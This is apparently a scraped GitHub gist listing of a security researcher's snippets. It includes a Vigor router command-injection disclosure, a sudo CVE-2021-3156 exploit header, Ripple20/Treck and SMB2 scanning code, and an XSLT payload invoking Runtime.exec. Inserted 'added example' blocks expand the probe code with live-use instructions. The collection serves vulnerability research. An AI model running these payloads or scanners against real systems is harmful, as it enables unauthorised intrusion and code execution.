🤣
Read the fucking source code

swing WinMin

@WinMin
WinMin / Disclosure of vulnerabilities in Vigor2960 and Vigor3900.md
Last active August 18, 2022 08:27
Disclosure of vulnerabilities in Vigor2960 and Vigor3900

Version

Vigor2960 fw1.5.1.1RC3 (r8167)
Vigor3900 fw1.5.1.1beta_r8167

Vulnerability details

There are several command injection vulnerabilities in the mainfunction.cgi file. The details are as follows:

1. in downlaod_ovpn function

@WinMin
WinMin / wslport.ps1
Created June 23, 2020 05:55
wsl2 open port
param($port, $op='open', $protocol='tcp')
# Remove firewall exception rules
Function removeFirewall(){
    Invoke-Expression "Remove-NetFireWallRule -DisplayName 'WSL 2 Firewall Unlock *' ";
    Invoke-Expression "netsh interface portproxy reset";
}
# author: @leommxj @swing
import socket, struct, sys, time
from functools import reduce

class Smb2Header:
    def __init__(self, command, message_id):
        self.protocol_id = "\xfeSMB"
        self.structure_size = "\x40\x00"  # Must be set to 0x40
        self.credit_charge = "\x00"*2
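As an added example that is not part of the gist above (whose preview stops at the credit_charge field), here is the same 64-byte SMB2 packet header packed and parsed with struct in Python 3. The field layout is taken from MS-SMB2 section 2.2.1.2; the NetBIOS session-service framing is what a scanner prepends before writing to TCP port 445. Field names and the helper names are this example's own choices.

```python
# Added example, not part of the gist above: the 64-byte SMB2 packet header
# (MS-SMB2 section 2.2.1.2) packed and parsed with struct in Python 3, plus
# the 4-byte NetBIOS session-service length prefix used on TCP port 445.
import struct

SMB2_PROTOCOL_ID = b"\xfeSMB"
SMB2_HEADER_SIZE = 0x40      # StructureSize is always 64 for SMB2/3
SMB2_NEGOTIATE = 0x0000      # Command: NEGOTIATE, the first request a client sends

# Little-endian field layout of the sync header:
# ProtocolId(4) StructureSize(2) CreditCharge(2) Status(4) Command(2)
# CreditRequest(2) Flags(4) NextCommand(4) MessageId(8) Reserved(4)
# TreeId(4) SessionId(8) Signature(16)
_HEADER_FMT = "<4sHHIHHIIQIIQ16s"
_HEADER_FIELDS = ("protocol_id", "structure_size", "credit_charge", "status",
                  "command", "credit_request", "flags", "next_command",
                  "message_id", "reserved", "tree_id", "session_id", "signature")
assert struct.calcsize(_HEADER_FMT) == SMB2_HEADER_SIZE


def build_smb2_header(command, message_id, credit_charge=0, credit_request=0,
                      flags=0, tree_id=0, session_id=0, signature=b"\x00" * 16):
    """Return the 64-byte header; Status, NextCommand and Reserved stay zero."""
    return struct.pack(_HEADER_FMT, SMB2_PROTOCOL_ID, SMB2_HEADER_SIZE,
                       credit_charge, 0, command, credit_request, flags, 0,
                       message_id, 0, tree_id, session_id, signature)


def parse_smb2_header(data):
    """Decode the header at the start of data, rejecting non-SMB2 input."""
    if len(data) < SMB2_HEADER_SIZE:
        raise ValueError("short SMB2 header: %d bytes" % len(data))
    hdr = dict(zip(_HEADER_FIELDS,
                   struct.unpack(_HEADER_FMT, data[:SMB2_HEADER_SIZE])))
    if hdr["protocol_id"] != SMB2_PROTOCOL_ID:
        raise ValueError("not an SMB2 packet")
    if hdr["structure_size"] != SMB2_HEADER_SIZE:
        raise ValueError("bad StructureSize %#x" % hdr["structure_size"])
    return hdr


def wrap_netbios(smb_message):
    """NetBIOS session service framing: zero byte + 3-byte big-endian length."""
    if len(smb_message) > 0xffffff:
        raise ValueError("message too long for NetBIOS framing")
    return struct.pack(">I", len(smb_message)) + smb_message


def unwrap_netbios(data):
    """Return (message, remaining) for one framed message, or None if incomplete."""
    if len(data) < 4:
        return None
    length = struct.unpack(">I", data[:4])[0] & 0xffffff
    if len(data) < 4 + length:
        return None
    return data[4:4 + length], data[4 + length:]
```

A scanner sends `wrap_netbios(build_smb2_header(SMB2_NEGOTIATE, 0) + negotiate_body)` over a TCP connection to port 445 and feeds the reply through `unwrap_netbios` and `parse_smb2_header`; the NEGOTIATE request body itself is not shown here. Checking StructureSize and the protocol id before trusting any other field is what keeps a malformed or SMB1 response from being misread.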
@WinMin
WinMin / ripple20-treck-scan.py
Created July 2, 2020 05:24
ripple20-treck-scan.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#author:swing
from scapy.all import *
ICMP_MS_SYNC_REQ_TYPE = 0xa5
ICMP_MS_SYNC_RSP_TYPE = 0xa6
def keep_icmp_handler(func):
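As an added example that is not part of the gist above (which builds its probe with scapy), here is the Treck fingerprint probe built with struct alone, together with the reply check and the IPv4 header stripping a raw-socket receiver needs. The only protocol fact relied on is the one the gist encodes in its constants: a Treck stack answers ICMP type 0xa5 with type 0xa6. The id/seq layout after the checksum mirrors ICMP echo and, like the probe id 0x1337 and the helper names, is this example's own assumption.

```python
# Added example, not part of the gist above: the Treck fingerprint probe built
# with struct instead of scapy. Treck replies to ICMP type 0xa5 with type 0xa6;
# the id/seq layout after the checksum mirrors ICMP echo and is an assumption
# of this example, as is the probe id 0x1337.
import struct

ICMP_MS_SYNC_REQ_TYPE = 0xa5   # type 165: request the Treck stack answers
ICMP_MS_SYNC_RSP_TYPE = 0xa6   # type 166: reply that fingerprints Treck
ICMP_HEADER_LEN = 8


def icmp_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (odd length zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xffff) + (total >> 16)
    return (~total) & 0xffff


def build_icmp_message(msg_type, code=0, ident=0x1337, seq=1, payload=b""):
    """type(1) code(1) checksum(2) id(2) seq(2) + payload, checksum filled in."""
    body = struct.pack("!BBHHH", msg_type, code, 0, ident, seq) + payload
    csum = icmp_checksum(body)
    return body[:2] + struct.pack("!H", csum) + body[4:]


def build_ms_sync_probe(ident=0x1337, seq=1):
    """The type 0xa5 probe a scanner sends to each target."""
    return build_icmp_message(ICMP_MS_SYNC_REQ_TYPE, ident=ident, seq=seq)


def strip_ip_header(packet):
    """Raw sockets return the IPv4 header too; skip IHL*4 bytes to reach ICMP."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (packet[0] & 0x0f) * 4
    return packet[ihl:]


def is_treck_reply(icmp_bytes):
    """True only for a checksum-valid ICMP message of the Treck reply type."""
    if len(icmp_bytes) < ICMP_HEADER_LEN or icmp_checksum(icmp_bytes) != 0:
        return False
    return icmp_bytes[0] == ICMP_MS_SYNC_RSP_TYPE
```

To use it live, open `socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)` (this needs root), `sendto` the probe, and pass what `recvfrom` returns through `strip_ip_header` before `is_treck_reply`, since the kernel hands back the IPv4 header with the ICMP payload. The checksum check matters: a truncated or damaged reply that happens to start with 0xa6 should not count as a hit, and a host that answers with anything other than type 0xa6 is simply not identified by this probe.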
@WinMin
WinMin / show_protocol.py
Created July 22, 2020 06:00
show protocol in gdb debug
from scapy.all import *
from scapy.layers.http import *
import gdb

class ShowProcto(gdb.Command):
    """
    Usage: xpr/size memaddr procto_type
    Example:
    (gdb) xpr/20 0x7fffffffe238 TCP
@WinMin
WinMin / CVE-2021-3156-exploit.c
Last active August 9, 2021 02:44
CVE-2021-3156-exploit
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
/*
author: swing @ bestswngs@gmail.com
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue
@WinMin
WinMin / theme.css
Created March 4, 2022 06:01 — forked from fatalbit/theme.css
IDA Monokai Color Palette
/* INSTALL:
*
* Put this file under the respective directory.
* Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css
* Linux & MacOS: ~/.idapro/themes/monokai/theme.css
*
* In Options -> Colors change theme to monokai
*
* */
@importtheme "dark";
@WinMin
WinMin / msl.py
Last active June 5, 2022 13:32
macOS Subsystem for Linux (powered by Docker)
#!/usr/bin/env python3
import docker
import os
import platform
import logging
import argparse
from distutils.dir_util import mkpath
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template>
    <!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
    <!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
    <!-- #114 Utf8: open -a calculator -->
    <!-- #115 String: touch /tmp/pwn -->
    <xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
    <xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
    <!-- #132 Utf8: <init> -->
    <AAA select="&lt;init&gt;"/>
@WinMin
WinMin / fgt_7.4.x_rootfs_decrypt.py
Created March 18, 2024 07:23 — forked from rrrrrrri/fgt_7.4.x_rootfs_decrypt.py
fgt_7.4.x_rootfs_decrypt
import magic
import r2pipe
import hashlib
import argparse
import subprocess
from unicorn import *
from unicorn.x86_const import *
# from udbserver import * # uncomment this line if you want to debug
def pad_size(size):